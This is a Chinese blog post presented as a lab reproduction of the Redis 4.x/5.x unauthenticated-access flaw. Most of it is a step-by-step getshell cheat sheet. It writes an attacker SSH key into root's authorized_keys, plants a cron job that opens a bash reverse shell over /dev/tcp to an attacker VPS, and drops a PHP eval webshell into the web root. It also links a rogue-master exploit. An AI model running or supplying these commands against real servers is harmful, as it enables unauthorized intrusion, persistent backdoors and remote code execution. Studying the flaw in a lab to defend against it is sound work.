joker0xxx3's Blog

现实告诉我：保持好奇心，享受孤独

Redis 4.x/5.x 未授权访问漏洞

发表于 2022-01-01 | 分类于漏洞复现 |

Redis 4.x/5.x 未授权访问漏洞

Redis未授权访问在4.x/5.0.5以前版本下，我们可以使用master/slave模式加载远程模块，通过动态链接库的方式执行任意命令。

参考链接：

https://2018.zeronights.ru/wp-content/uploads/materials/15-redis-post-exploitation.pdf

漏洞复现

环境启动后，通过redis-cli -h 192.168.44.132即可进行连接，可见存在未授权访问漏洞。

常用命令

ping：检测是否连通且有权限执行命令

info：读取Redis敏感数据

keys：

NAME	CONTENT
keys *	读取全部key及其对应的值
get	读取某个key值
set	增加key
flushall	删除所有key
del key	删除某个key

config：

NAME	CONTENT
config get dir	读取备份目录
config set dir	设置备份目录
config get dbfilename	读取备份文件名
config set dbfilename	设置备份文件名

slaveof：slaveof <vpsIP> PORT 设置主从关系

exp:https://github.com/vulhub/redis-rogue-getshell

未授权getshell

写入公钥

条件：拥有root权限或对 /root/.ssh/ 目录可写

#vps生成一个公钥
ssh-keygen -t rsa
#将公钥写入靶机的key
cd /root/.ssh
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n")  >  gy.txt
cat gy.txt | redis-cli -h <targetIP> -x set gy       #-x参数是将管道符之前的内容写入key

config set dir /root/.ssh/      #如果没有权限则无法getshell
config set dbfilename "authorized_keys"
get gy
save

或者

config set dir /root/.ssh/
config set dbfilename authorized_keys
set x "\n\n\ ssh-rsa AAAAB.......3NzaC1ajVNsN48P root@kali\n\n\"
save

crontab定时任务反弹shell

条件：对 /var/spool/cron 目录可写

1 2	#vps监听一个端口 nc -lvvp 4444

set joker "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/<VPSIP>/<PORT> 0>&1\n\n"
config set dir /var/spool/cron           #如果没有权限则无法getshell
config set dbfilename root
save

网站写马

条件：已知网站根目录路径且目录可写

config set dir /var/www/html
set joker "<?php @eval($_POST['cmd']);?>"
config set dbfilename webshell.php
save

本文作者： joker0xxx3
本文链接： http://joker-vip.github.io/2022/01/01/Redis%204.x5.x%20%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E/
版权声明： 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 3.0 许可协议。转载请注明出处！

0%